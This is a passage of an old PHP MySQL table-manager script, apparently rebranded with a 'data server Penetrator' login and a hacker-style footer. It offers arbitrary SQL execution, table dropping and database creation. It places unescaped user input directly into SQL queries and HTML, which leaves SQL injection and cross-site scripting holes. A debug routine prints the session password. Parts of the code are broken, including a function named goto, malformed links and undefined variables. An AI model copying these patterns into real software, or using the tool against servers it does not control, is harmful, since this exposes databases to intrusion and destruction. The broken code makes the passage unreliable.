  854.  echo"<input type=hidden name='dbname' value='$dbname' />\n";
  855.  echo"<tr>\n";
  856.  
  857.  $mxlen = 80;//max width of the form fields.
  858.  for($i=0; $i < $flds; $i++){
  859.       $auto = "false";
  860.       echo "<th>".mysql_field_name($fields, $i);
  861.       $fieldname = mysql_field_name($fields, $i);  // added
  862.       $type  = mysql_field_type($result, $i);
  863.       $flen = mysql_field_len($result, $i);//length of the field
  864.       $flagstring = mysql_field_flags ($result, $i);
  865.     // Start of new code for set drop down
  866.       $newsql = "show columns from $tablename like '%".$fieldname."'";
  867.       $newresult = exequery($newsql, $tablename, $dbname);
  868.       //mysql_query($newsql) or die ('I cannot get the query because: ' . mysql_error());
  869.       $arr=mysql_fetch_array($newresult);
  870.     // End of new code block for set drop down
  871.       if (eregi("primary",$flagstring )){
  872.        $type .= " PK ";
  873.       }
  874.       if(eregi("auto",$flagstring )){
  875.        $type .= " auto_increment";
  876.        $auto = "true";
  877.       }
  878.       if ($auto=="true"){
  879.         echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' value=0 /></td></tr>\n";
  880.       }elseif($flen > $mxlen){
  881.         $rws= $flen/$mxlen;
  882.         if($rws>10){
  883.              $rws=10; //max length of textarea
  884.         }
  885.         echo"<td>$type</td><td><textarea name='array[$i]' rows=$rws cols=$mxlen></textarea></td></tr>\n";
  886.         // Start of new code for set drop down
  887.       }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
  888.        $num=substr_count($arr[1],',') + 1;  // count the number of entries
  889.        $pos=strpos($arr[1],'(' ); //find the position of '('
  890.        $newstring=substr($arr[1],$pos+1);  // get rid of the '???('
  891.        $snewstring=str_replace(')','',$newstring); // get rid of the last ')'
  892.        $nnewstring=explode(',',$snewstring,$num); // stick into an array
  893.        if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
  894.            echo "<td>Set (select one or more)</td>";
  895.            echo"<td><select name='array[$i][]' size='3' multiple>";
  896.        }else{//Enum one value only
  897.         echo "<td>Enum</td>";
  898.            echo"<td><select name='array[$i]'>";
  899.        }
  900.        for($y=0; $y<$num;$y++){
  901.        echo"<option value=$nnewstring[$y]>$nnewstring[$y]";
  902.        }
  903.         echo"</select></td></tr>\n";
  904.     // End of new code block for set drop down
  905.       }else{
  906.        echo"<td>$type</td><td><input type=text name='array[$i]' size='$flen' /></td></tr>\n";
  907.       }
  908.  }
  909.  echo"<tr><td><input class=but type=submit name='addrec' value='Add Record' /></td>\n";
  910.  echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
  911.  echo"</tr>";
  912.  echo"</table>\n";
  913.  echo"</form>\n";
  914. }
  915.  
  916.  
  917. //*********************Edit Form ***************
  918. function editform($tablename, $dbname, $result, $edit, $pk, $pv){
  919.         $row=mysql_fetch_array($result);
  920.         echo"<form action='$action'  method=post>\n";
  921.         echo"<table border=0 width ='100%' align='center'>\n";
  922.  
  923.         $flds = mysql_num_fields($result);
  924.         $fields = mysql_list_fields($dbname, $tablename);
  925.         echo"<input type=hidden name=tablename value='$tablename' />\n";
  926.  
  927.         echo"<input type=hidden name='dbname' value='$dbname' />\n";
  928.         echo"<tr>";
  929.         $mxlen = 80;//max width of the form fields
  930.         for($i=0; $i < $flds; $i++){
  931.         $fname=mysql_field_name($fields, $i);
  932.                 echo "<th>$fname";
  933.                  $flen = mysql_field_len($result, $i);//length of the field
  934.                 $nslash = StripSlashes($row[$i]);
  935.         // Start of new code for set drop down
  936.       $newsql = "show columns from $tablename like '%".$fname."'";
  937.       $newresult = exequery($newsql, $tablename, $dbname);
  938.       $arr=mysql_fetch_array($newresult);
  939.     // End of new code block for set drop down
  940.  
  941.                 if($flen > $mxlen){
  942.                         $rws= $flen/$mxlen;
  943.                                 if($rws>10){
  944.                                 $rws=10; //max length of textarea
  945.                         }
  946.                         echo"<td><textarea name='array[$i]' rows=$rws cols=$mxlen>$nslash</textarea></td></tr>\n";
  947. // Start of new code for set drop down
  948.           }elseif (strncmp($arr[1],'set',3)==0 || strncmp($arr[1],'enum',4)==0){  // We have a field type of set or enum
  949.            $num=substr_count($arr[1],',') + 1;  // count the number of entries
  950.            $pos=strpos($arr[1],'(' ); //find the position of '('
  951.            $newstring=substr($arr[1],$pos+1);  // get rid of the '???('
  952.            $snewstring=str_replace(')','',$newstring); // get rid of the last ')'
  953.            $nnewstring=explode(',',$snewstring,$num); // stick into an array
  954.            if(strncmp($arr[1],'set',3)==0 ){//Sets can have combinations of values
  955.                echo"<td><select name='array[$i][]' multiple size='3'>";
  956.            }else{//Enum one value only
  957.                echo"<td><select name='array[$i]'>";
  958.            }
  959.            $nsel=explode(",",$nslash);
  960.           for($y=0; $y<$num;$y++){
  961.                 //geteach value 'a,b,c'
  962.                 $sel="";
  963.                 for($e=0; $e<count($nsel);$e++){
  964.                     if($nnewstring[$y]=="'".$nsel[$e]."'"){
  965.                         $sel="selected";
  966.                     }
  967.                 }
  968.                 echo"<option value=$nnewstring[$y] $sel>$nnewstring[$y]";
  969.            }
  970.             echo"</select></td></tr>\n";
  971. // End of new code block for set drop down
  972.  
  973.  
  974.         }else{
  975.                         echo"<td><input type=text name='array[$i]' size='$flen' value='$nslash' /></td></tr>\n";
  976.                 }
  977.                 for($f =0; $f< count($pk);$f++){
  978.                         echo"<input type=hidden name=pk[$f] value='$pk[$f]' />";
  979.                         echo"<input type=hidden name=pv[$f] value='$pv[$f]' />\n";
  980.                 }
  981.         }
  982.         echo"<tr><td><input class=but type=submit name='editrec' value='Update' /></td>\n";
  983.         echo"<td><input class=but type=reset name='reset' value='Reset Form' /></td>\n";
  984.         echo"</tr>";
  985.         echo"</table>\n";
  986.         echo"</form>\n";
  987. }
  988. //************************Edit Record*************************
  989. function editrec($dbname, $tablename, $pk, $pv, $array){
  990.  
  991.         //$result = @mysql_query( "Select * from $tablename" );
  992.     $result = exequery("Select * from $tablename", $tablename, $dbname);
  993.         $flds = mysql_num_fields($result);
  994.         $fields = mysql_list_fields($dbname, $tablename);
  995.  
  996. //Build Query
  997.            $qry="";
  998.     $query = "UPDATE $tablename set ";
  999.         for ($x =0; $x < $flds; $x++){
  1000.                 $fie = mysql_field_name($fields, $x );
  1001.         // SET and ENUM
  1002.          if(is_array($array[$x])){
  1003.             $mval="";
  1004.             for($m=0; $m < count($array[$x]); $m++){
  1005.                 if($m+1 == count($array[$x])){
  1006.                     $mval.= AddSlashes($array[$x][$m]);
  1007.                 }else{
  1008.                     $mval.= AddSlashes($array[$x][$m]).",";
  1009.                 }
  1010.                 $fval = $mval;
  1011.             }
  1012.         }else{
  1013.                     $fval = AddSlashes($array[$x]);
  1014.         }
  1015.         //**************************
  1016.                 //$fval = AddSlashes($array[$x]);
  1017.                 $qry .= "$fie = '$fval'";
  1018.                 if ($x < $flds-1){
  1019.                         $qry.= ", ";
  1020.                 }
  1021.         }
  1022.         $whr = buildwhr( $pk, $pv);
  1023.         $whr =StripSlashes($whr);
  1024.         $query .= "$qry";
  1025.         $query .= " where $whr";
  1026.  
  1027.     $result=exequery($query, $tablename, $dbname);
  1028.         if($result){
  1029.                 return $result;
  1030.         }else{
  1031.                 return false;
  1032.         }
  1033. }
  1034. //****************** Number of Primary Keys ***********************
  1035. function numpk($result){
  1036.         $z =0;
  1037.         for ($i = 0; $i < $flds; $i++) {
  1038.                 //Find the primary key
  1039.                 $flagstring = mysql_field_flags ($result, $i);
  1040.                 if(eregi("primary",$flagstring )){
  1041.                         $z++;
  1042.                 }
  1043.         }
  1044.         return $z;
  1045. }
  1046. //********************Size field*****************
  1047. function fieldformsize($ft, $i, $l){
  1048.         $ft= trim(strtoupper($ft));
  1049.         if($ft =="DATE" || $ft=="TIME" || $ft== "DATETIME" ){
  1050.         }elseif( $ft=="TINYTEXT" || $ft=="BLOB" || $ft=="TEXT" || $ft =="MEDIUMBLOB"){
  1051.                 echo"<input type=hidden name='leng[$i]' value=$l>";
  1052.         }elseif($ft=="MEDIUMTEXT" || $ft=="LONGBLOB"|| $ft=="LONGTEXT" || $ft=="TINYBLOB"){
  1053.                 echo"<input type=hidden name='leng[$i]' value=$l>";
  1054.         }elseif($ft=="INT" || $ft=="TINYINT"|| $ft=="SMALLINT"|| $ft=="MEDIUMINT"|| $ft=="BIGINT" || $ft=="INTEGER"){
  1055.                 echo"<input type=text name='leng[$i]' size=5  value=$l>";
  1056.         }elseif($ft=="YEAR" ){
  1057.                 echo"<select name='leng[$i]'>";
  1058.                 echo"<option value='4'>4";
  1059.                 echo"<option value='2'>2";
  1060.                 echo"</select>\n";
  1061.     }elseif($ft=="SET"|| $ft=="ENUM"){
  1062.         echo"<input type=text name='leng[$i]' title='values eg \"a\", \"b\", \"c\"' value='' />";
  1063.         }else{
  1064.                 echo"<input type=text name='leng[$i]' size=5 value=$l />\n";
  1065.         }
  1066. }
  1067.  
  1068. //******************************Display Row ******************************
  1069. function displayrow($dbname, $tbl, $pk, $pkfield, $cpk, $row, $flds){
  1070.         $pkfs="";
  1071.         $hv="";
  1072.         $hf="";
  1073.  
  1074.         if($cpk >0 && !empty($pkfield)){
  1075.                 for($a = 0; $a < $cpk; $a++){
  1076.                         $fieldn = $pkfield[$a];
  1077.                         $hf .= "<input type=hidden name=pk[$a] value='$pkfield[$a]' />";
  1078.                         $hv .= "<input type=hidden name=pv[$a] value='$row[$fieldn]' />";
  1079.                 }
  1080.         }else{ //No Primary Key so use all fields
  1081.                 $fields = mysql_list_fields($dbname, $tbl);
  1082.                 for($b = 0; $b < $flds; $b++){
  1083.                         $fie = mysql_field_name($fields, $b );
  1084.                         $hf .= "<input type=hidden name=pk[$b] value='$fie' />";
  1085.                         $hv .= "<input type=hidden name=pv[$b] value='$row[$b]' />";
  1086.                 }
  1087.         }
  1088.         echo"<tr>\n";
  1089.         //edit Record
  1090.         echo"<td><form action='$action' method=post>\n";
  1091.         echo"<input type=hidden name=dbname value='$dbname' />\n";
  1092.         echo"<input type=hidden name=tablename value='$tbl' />\n";
  1093.         echo"<input type=hidden name=npkeys value='$cpk' />\n";
  1094.         echo"$hf";
  1095.         echo"$hv";
  1096.         echo"<input class=sml type=submit name=edit value='Edit Record' />\n";
  1097.         echo"</form></td>\n";
  1098.  
  1099.         //Delete record
  1100.         echo"<td><form action='$action' method=post>\n";
  1101.         echo"<input type=hidden name=dbname value='$dbname' />\n";
  1102.         echo"<input type=hidden name=tablename value='$tbl' />\n";
  1103.         echo"<input type=hidden name=num value='$cpk' />\n";
  1104.         echo"$hf";
  1105.         echo"$hv";
  1106.         echo"<input class=smldel type=submit name=delete value='Delete Record' />\n";
  1107.         echo"</form></td>";
  1108.  
  1109.         //Display all the columns.
  1110.         for($col = 0; $col < $flds; $col ++){
  1111.                 $nslash = StripSlashes($row[$col]);
  1112.                 echo"<td>$nslash</td>";
  1113.         }
  1114.         echo"</tr>";
  1115.  
  1116. }
  1117. //***********************Remove Array Copy********************************
  1118. //removes copies from an array $x.
  1119.  
  1120. function removearraycopy($x){
  1121.         $leng= count($x);
  1122.         sort($x);
  1123.         $farr=array();
  1124.  
  1125.         for ($i =0; $i < $leng; $i++){
  1126.                 $flag=false;
  1127.                 for ($s =0; $s < count($farr); $s++){
  1128.                         if($x[$i]==$farr[$s]){
  1129.                                 $flag=true;
  1130.                         }
  1131.                 }
  1132.                 if ($flag == false){
  1133.                         $farr[count($farr)] = $x[$i];
  1134.                 }
  1135.         }
  1136.         return $farr;
  1137. }
  1138. //***********************<< page position >>********************************
  1139. function whichpage($num_rows, $pagemax, $pg, $tablename, $searchval){
  1140.         $pgs = $num_rows/$pagemax;
  1141.         $pgs=ceil($pgs);
  1142.                             //round up the number of pages.
  1143.         echo"<form action='$action' id='recspage' method='post' name='recspage'>\n";
  1144.     echo"Total number of records $num_rows, displayed on $pgs pages of \n";
  1145.     echo"<input type='text'  name='pagemax' value='$pagemax' size='4' onchange='javascript:this.form.submit();' title='Type the number records to display on a page then click outside the box' /> \n";
  1146.         echo"<input type='hidden' name='searchval' value='$searchval'  />\n";
  1147.     echo"<input type='hidden' name='tablename' value='$tablename'  />\n";
  1148.     echo"records per page.</form> \n";
  1149.     $pagescrol="";
  1150.     $sval="";
  1151.           if($pgs >1){
  1152.             $pagescrol="<div class='pagecount'>\n";
  1153.                         $nxt=$pg+1;
  1154.             $bk=$pg-1;
  1155.             $lst=$pgs;
  1156.             $end=$lst-1;
  1157.             $showp=$pg+1;
  1158.            if($searchval !=""){
  1159.             $sval="&amp;searchval=$searchval";
  1160.            }
  1161.            $pagescrol .= "<form name='pages' id='pages' action='$action' method='get'>\n";
  1162.             if($pg>=1){
  1163.                 $pagescrol .= " <a href='$action?tablename=$tablename&amp;pg=0$sval' title='To first page'> 1 :<< </a> \n";
  1164.                                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$bk$sval' title='Back one page'> < </a> \n";
  1165.                         }
  1166.            $pagescrol .= "<input type='text' name='pg' value='$showp' size='4' onchange='javascript:this.form.submit();' title='Type a page number then click outside the box' />\n";
  1167.            $pagescrol .= "<input type='hidden' name='pback' value='true'  />\n";
  1168.            $pagescrol .= "<input type='hidden' name='searchval' value='$searchval'  />\n";
  1169.            $pagescrol .= "<input type='hidden' name='tablename' value='$tablename'  />\n";
  1170.  
  1171.            if($showp < $lst){
  1172.                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$nxt$sval' title='Next page'> > </a> \n";
  1173.                 $pagescrol .= " <a href=''action'?tablename=$tablename&amp;pg=$end$sval' title='To Last page'> >>: $lst</a> \n";
  1174.            }
  1175.            $pagescrol .= "</form>\n";
  1176.            $pagescrol.="</div>\n";
  1177.       }
  1178.         return $pagescrol;
  1179. }
  1180.  
  1181. //*************Display Footer*************************
  1182. //Please don't remove or change.
  1183. function display_foot(){
  1184.  
  1185.     echo"<div class='foot'>Version $version &copy; ".date('Y')." <a style='text-decoration:none;' target='_blank' href='http://vnbrain.net'>ly0kha</a></div>";
  1186.  
  1187.     }
  1188. //*************My Size*************************
  1189. //Returns the size of a table or database
  1190. function mysize($dbname, $tablename){
  1191.     $like="";
  1192.     $total="";
  1193.     $t=0;
  1194.     if($tablename !=""){
  1195.         $like=" like '$tablename'";
  1196.     }
  1197.     $sql= "SHOW TABLE STATUS FROM $dbname $like";
  1198.     //$result = mysql_query($sql);
  1199.     $result=exequery($sql, $tablename, $dbname);
  1200.     if($result){
  1201.  
  1202.         while($rec = mysql_fetch_array($result)){
  1203.          $t+=($rec['Data_length'] + $rec['Index_length']);
  1204.          }
  1205.         $total ="<span class='bytes'>$t bytes</span>";
  1206.     }else{
  1207.         $total="Unknowen";
  1208.     }
  1209.     return($total);
  1210. }
  1211.  
  1212.  
  1213. //**************************************
  1214. //DEBUG to show all being passed to the page
  1215. function showpassingvars(){
  1216.         echo"Get: ";
  1217.          foreach($_GET as $pram=>$value){
  1218.                  echo"$pram: $value, ";
  1219.          }
  1220.         echo"<br>Post: ";
  1221.          foreach($_POST as $pram=>$value){
  1222.                   echo"$pram: $value, ";
  1223.          }
  1224.          echo"<br>Session: ";
  1225.          foreach($_SESSION as $pram=>$value){
  1226.                  echo"$pram: $value, ";
  1227.          }
  1228.  }
  1229. echo"<html>\n";
  1230. echo"<meta http-equiv='Content-Type' content='text/html; charset=windows-1256'>\n";
  1231. echo"<head>\n";
  1232. echo"<title>Scarpt contact databases</title>\n";
  1233. echo"<STYLE>
  1234.  
  1235. BODY
  1236. {
  1237.        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
  1238. }
  1239.  
  1240. tr {
  1241. BORDER-RIGHT:  #cccccc ;
  1242. BORDER-TOP:    #cccccc ;
  1243. BORDER-LEFT:   #cccccc ;
  1244. BORDER-BOTTOM: #cccccc ;
  1245. color: #ffffff;
  1246. }
  1247. td {
  1248. BORDER-RIGHT:  #cccccc ;
  1249. BORDER-TOP:    #cccccc ;
  1250. BORDER-LEFT:   #cccccc ;
  1251. BORDER-BOTTOM: #cccccc ;
  1252. color: #cccccc;
  1253. }
  1254. .table1 {
  1255. BORDER: 1;
  1256. BACKGROUND-COLOR: #000000;
  1257. color: #333333;
  1258. }
  1259. .td1 {
  1260. BORDER: 1;
  1261. font: 7pt tahoma;
  1262. color: #ffffff;
  1263. }
  1264. .tr1 {
  1265. BORDER: 1;
  1266. color: #cccccc;
  1267. }
  1268. table {
  1269. BORDER:  #eeeeee  outset;
  1270. BACKGROUND-COLOR: #000000;
  1271. color: #cccccc;
  1272. }
  1273. input {
  1274. BORDER-RIGHT:  #990000 1 solid;
  1275. BORDER-TOP:    #990000 1 solid;
  1276. BORDER-LEFT:   #990000 1 solid;
  1277. BORDER-BOTTOM: #990000 1 solid;
  1278. BACKGROUND-COLOR: #333333;
  1279. font: 9pt tahoma;
  1280. color: #ffffff;
  1281. }
  1282. select {
  1283. BORDER-RIGHT:  #ffffff 1 solid;
  1284. BORDER-TOP:    #999999 1 solid;
  1285. BORDER-LEFT:   #999999 1 solid;
  1286. BORDER-BOTTOM: #ffffff 1 solid;
  1287. BACKGROUND-COLOR: #000000;
  1288. font: 9pt tahoma;
  1289. color: #CCCCCC;;
  1290. }
  1291. submit {
  1292. BORDER:  buttonhighlight 1 outset;
  1293. BACKGROUND-COLOR: #272727;
  1294. width: 40%;
  1295. color: #cccccc;
  1296. }
  1297. textarea {
  1298. BORDER-RIGHT:  #ffffff 1 solid;
  1299. BORDER-TOP:    #999999 1 solid;
  1300. BORDER-LEFT:   #999999 1 solid;
  1301. BORDER-BOTTOM: #ffffff 1 solid;
  1302. BACKGROUND-COLOR: #333333;
  1303. font: Fixedsys bold;
  1304. color: #ffffff;
  1305. }
  1306. BODY {
  1307. margin: 1;
  1308. color: #cccccc;
  1309. background-color: #000000;
  1310. }
  1311. A:link {COLOR:red; TEXT-DECORATION: none}
  1312. A:visited { COLOR:red; TEXT-DECORATION: none}
  1313. A:active {COLOR:red; TEXT-DECORATION: none}
  1314. A:hover {color:blue;TEXT-DECORATION: none}
  1315.  
  1316. </STYLE>\n";
  1317. echo"<meta http-equiv='Content-Type' content='text/html charset=windows-1256'>";
  1318. echo"<title>Scarpt contact databases </title>\n";
  1319. echo"<meta name='author' content='Tony Aslett'>";
  1320. echo"<meta name='title' content='PHP:MySQL Table Manager'>";
  1321. echo"<meta name='description' content='Table Manager for MySQL Database'>";
  1322. echo"<link rel='stylesheet' href='tmgrstyles.css' type='text/css'>\n";
  1323. echo"</head>\n";
  1324. echo"<body>\n";
  1325.  
  1326. $showall=true;
  1327. echo"<h2 class=h >Scarpt contact databases </h2>\n";
  1328. //******************* Session Logon ***********************
  1329. if(isset($_POST['logout'])){
  1330.  
  1331.                 $_POST['dbname']="";
  1332.                 session_unset();
  1333.                 session_destroy();
  1334. }
  1335. if(isset($_POST['userid']) && isset($_POST['pword1'])){
  1336.         $_SESSION['user'] = $_POST['userid'];
  1337.         $_SESSION['password'] = $_POST['pword1'];
  1338. }
  1339.  
  1340. if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){
  1341.         echo"<div align=center>";
  1342.         echo"<h2>Enter data server Penetrator</h2>\n";
  1343.         If(!isset($dbnamearray)){
  1344.                 $dbnamearray="";
  1345.         }
  1346.         show_login($dbnamearray);
  1347.         echo"</div>";
  1348. }else{
  1349.         //show logout option.
  1350.         echo"<div align=right>";
  1351.         endsess();
  1352.         echo"</div>";
  1353. }
  1354. //*****dbname
  1355. if(isset($_POST['dbname'])){
  1356.         $dbname=$_POST['dbname'];
  1357.     $_SESSION['dbname']= $_POST['dbname'];
  1358. }
  1359. //***** Host
  1360. if(isset($_POST['host'])){
  1361.     $host=$_POST['host'];
  1362.     $_SESSION['host']=$_POST['host'];
  1363. }
  1364. //******set tablename
  1365. if(isset($_GET['tablename']) ){
  1366.         $tablename=$_GET['tablename'];
  1367. }elseif(isset($_POST['tablename'])){
  1368.         $tablename=$_POST['tablename'];
  1369. }
  1370. //********** pagemax
  1371. if(isset($_POST['pagemax'])){ //&& is_int($_POST['pagemax'])){
  1372.     $isnum=true;
  1373.     for($o=0; $o<count($_POST['pagemax']); $o++){
  1374.             if($_POST['pagemax'][$o]>9){
  1375.                 $isnum=false;
  1376.             }
  1377.     }
  1378.     if($_POST['pagemax']>0 && $isnum){
  1379.         $_SESSION['pagemax']=$_POST['pagemax'];
  1380.     }
  1381. }
  1382.  if(isset($_SESSION['pagemax'])){
  1383.     $pagemax=$_SESSION['pagemax'];
  1384.  }
  1385. //******** create a new Database ************
  1386. if(isset($_POST['cndb'])){
  1387.     connectmysql();
  1388.         $sql="create database $_POST[ndbname]";
  1389.         $result=exequery($sql, " ", $_POST['ndbname']);
  1390.         if ($result){
  1391.                 $_SESSION['dbname'] = $_POST['ndbname'];
  1392.         $sql="Use $_POST[ndbname]";
  1393.             $result=exequery($sql, " ", $_POST['ndbname']);
  1394.         if($result){
  1395.             echo"<h2>????? ????? $_SESSION[dbname] </h2>\n";
  1396.         }
  1397.         }
  1398. }
  1399.  
  1400. //*********************************************
  1401. if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post
  1402.         //Databse names
  1403.         showdb();
  1404. }
  1405. //************************ Choose DB *************
  1406. if(isset($_POST['dbname']) && $_POST['dbname']==""){
  1407.     showdb();
  1408. }
  1409.  
  1410. //**********
  1411. if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){
  1412. //*************************************
  1413.                 //connection
  1414.  
  1415.                 if (isset($_SESSION['dbname'])){
  1416.                         $dbsetname = $_SESSION['dbname'];
  1417.                 }elseif(isset($_POST['dbname'])){
  1418.                         $dbsetname = $_POST['dbname'];
  1419.                         $_SESSION['dbname'] = $_POST['dbname'];
  1420.                 }else{
  1421.                         $dbsetname = $_POST['dbna'];
  1422.                         $_SESSION['dbname'] = $_POST['dbna'];
  1423.                 }
  1424. }
  1425. //*************************** we have a DB set
  1426. if(isset($dbsetname) && $dbsetname!=""){
  1427.                     $link= connectmysql();
  1428.             //echo"DBS: $dbsetname";
  1429.                     $conn = connectdb($dbsetname, $link);
  1430.  
  1431. //*********** Drop Table **************
  1432.         if(isset($_POST['deltable'])){
  1433.         $showall=false;
  1434.                 $tablename=$_POST['tablename'];
  1435.                 echo"<h1>!!! Warning!!!<br>You are trying to Clear this table $tablename<br>";
  1436.                 echo"Are you sure you want to do process?</h1>\n";
  1437.                 $va="Drop $tablename";
  1438.                 goto($tablename, $dbname,$action, 'del', 'droptab', $va );
  1439.         }
  1440.         if(isset($_POST['droptab'])){
  1441.                 $tablename=$_POST['tablename'];
  1442.                 $dsql = "drop table $tablename";
  1443.                 $result=exequery($dsql, $tablename, $dbname);
  1444.                 unset($tablename); //="false";
  1445.                 unset($_POST['tablename']);
  1446.         }
  1447. //*****************Write Your Own Query *****************
  1448.         if(isset($_POST['wyoq'])){  //post
  1449.                 $value="The main facade of Scarpt";
  1450.                 goto($tablename, $dbname, $action, 'but', 'start', $value );
  1451.                 echo"<form method='post'>\n";
  1452.                 echo"<input type='hidden' name='dbname' value=$dbname>\n";
  1453.                 //echo"<input type=text name='wyqota' width='500px' style='overflow-x:visible;'>\n";
  1454.  
  1455.                 echo"<textarea name='wyoqta' cols='60' rows='5' style='overflow-y:visible'></textarea>\n";
  1456.  
  1457.                 echo"<br><input class=but type=submit name='runquery' value='Execute Query'>\n";
  1458.                 echo"</form><br>\n";
  1459.         }
  1460.  
  1461.         if(isset($_POST['runquery'])){
  1462.                 $wyoqta = StripSlashes($_POST['wyoqta']);
  1463.                 $result=exequery($wyoqta, " ", " ");
  1464.  
  1465.                 if(@mysql_num_rows($result) >0){
  1466.                          $numrows=mysql_num_rows($result);
  1467.                         $flds=mysql_num_fields($result);
  1468.                         echo"<table>";
  1469.                         for($r=0; $r < $numrows; $r++){
  1470.                                 echo"<tr>";
  1471.                                 $row=mysql_fetch_array($result);
  1472.                                 for($col = 0; $col < $flds; $col ++){
  1473.                                         $nslash = StripSlashes($row[$col]);
  1474.                                         echo"<td>$nslash</td>";
  1475.                                 }
  1476.                                 echo"</tr>";
  1477.                         }
  1478.                         echo"</table>";
  1479.                 }elseif (mysql_affected_rows()){
  1480.                         echo" Number of Rows affected: ".mysql_affected_rows();
  1481.                 }else{
  1482.                         echo" Nothing returned from the query.";
  1483.                 }
  1484.         }
  1485. // ****************List Tables***************************
  1486.  
  1487.         if( ! isset($tablename) || $tablename==" " ){
  1488.                 $dbname=$_SESSION['dbname'];
  1489.                 $result = mysql_list_tables($_SESSION['dbname']);
  1490.                  $numtab = mysql_num_rows ($result);
  1491.                  if($numtab == 1){
  1492.                         $_SESSION['tablename'] =mysql_tablename($result, 0);
  1493.                  }
  1494.  
  1495. //***************** Buttons ******************************
  1496.                 if (isset($_POST['runquery'])){
  1497.                         $dbname=$_SESSION['dbname'];
  1498.                         $value="$dbname Start"; //Table Manager Start
  1499.                         goto("", $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
  1500.  
  1501.                 }elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ //write your own query.
  1502.                         echo"<table width=40% border=0 align='left' >\n";
  1503.                         echo"<tr><td>";
  1504.  
  1505.                         $va="The establishment of a new scale";
  1506.                         goto("", $_SESSION['dbname'], "create.php", 'but', 'create', $va );
  1507.           //  echo"<a href=create.php class='crt'>Create new Table</a>\n";
  1508.                         echo"</td><td>";
  1509.  
  1510.         $value="The main facade"; //Choose DB
  1511.                 goto("", "", $action, 'but', 'db', $value );
  1512.                 echo"</td>\n";
  1513.  
  1514.                         $value="Write Your Own Query";
  1515.                         goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
  1516.  
  1517.                         echo"</td></tr>";
  1518.                         echo"</table><br><br><br><br><div style='clear:both;'></div>";
  1519.  
  1520.                         echo"<table width=100% border=0 align='center' >\n";
  1521.                         for ($i =0; $i < $numtab; $i++) {
  1522.  
  1523.                                 $tb_names[$i] = mysql_tablename($result, $i);
  1524.                                 echo"<tr class='frow'><td align='center'>\n";
  1525.  
  1526.                                 $va="The agenda* $tb_names[$i]";
  1527.                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va );
  1528.                                 echo"</td><td  align='center' valign='middle'>\n";
  1529.  
  1530.                                 $va="Survey agenda $tb_names[$i]";
  1531.                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va );
  1532.                                 echo"</td><td  align='center' valign='middle'>\n";
  1533.  
  1534.                                 $va="Alter Table $tb_names[$i]";
  1535.                                 goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
  1536.                                 echo"</td><td align='center' valign='middle'>\n";
  1537.  
  1538.                                 searchtableform($tb_names[$i], $_SESSION['dbname']);
  1539.                                 echo"</td><td>";
  1540.                 //Table size in bytes
  1541.                echo mysize($_SESSION['dbname'],$tb_names[$i]);
  1542.  
  1543.                 echo"</td></tr>\n";
  1544.                         }//for
  1545.                         echo"</table>\n";
  1546.                 }
  1547.  
  1548.         }else{ //tablename is set
  1549. //***************** menu *****************************************
  1550.                 echo"<table><tr class='frow'><td>\n";
  1551.                 $value="$_SESSION[dbname] Start"; //Ex Table Manager Start
  1552.                 goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
  1553.                 echo"</td>\n";
  1554.  
  1555.         echo"<td>\n";
  1556.         $value="The main facade"; //Choose DB
  1557.                 goto("", "", $action, 'but', 'start', $value );
  1558.                 echo"</td>\n";
  1559.  
  1560.         echo"<td>\n";
  1561.         $value="Write Your Own Query";
  1562.                 goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
  1563.         echo"</td>\n";
  1564.  
  1565.                 if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){
  1566.                         echo"<td>";
  1567.                         //$tablename = $_POST['tablename'];
  1568.                         $va="Add a $tablename Record";
  1569.                         goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va );
  1570.                         echo"</td>\n";
  1571.                 }
  1572.  
  1573.                 if (!isset($_POST['deltable'])){
  1574.                         echo"<td>\n";
  1575.                         searchtableform($tablename, $_SESSION['dbname']);
  1576.                         echo"</td>\n";
  1577.                 }
  1578.                 echo"</tr></table>\n";
  1579.                 echo"<br />\n";
  1580.  
  1581. //**************************************************
  1582.  
  1583.                 if(isset($_POST['addrec'])){
  1584.            // $showall=false;
  1585.                         $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']);
  1586.                 }elseif(isset($_POST['add'])){
  1587.             $showall=false;
  1588.                         addform($tablename, $_SESSION['dbname']);
  1589.                 }elseif(isset($_POST['delete'])){
  1590.                         //delete record has been pushed
  1591.            // $showall=false;
  1592.                         $whr=buildwhr($_POST['pk'], $_POST['pv']);
  1593.                         $sql = "delete from $tablename where $whr";
  1594.                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
  1595.                 }elseif (isset($_POST['edit'])){//Edit
  1596.             $showall=false;
  1597.                         $whr = buildwhr( $_POST['pk'], $_POST['pv']);
  1598.                         //$tablename = $_SESSION['tablename'];
  1599.                         $sql= "Select * from $tablename where $whr";
  1600.  
  1601.                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
  1602.                         editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']);
  1603.                 }elseif(isset($_POST['editrec'])){
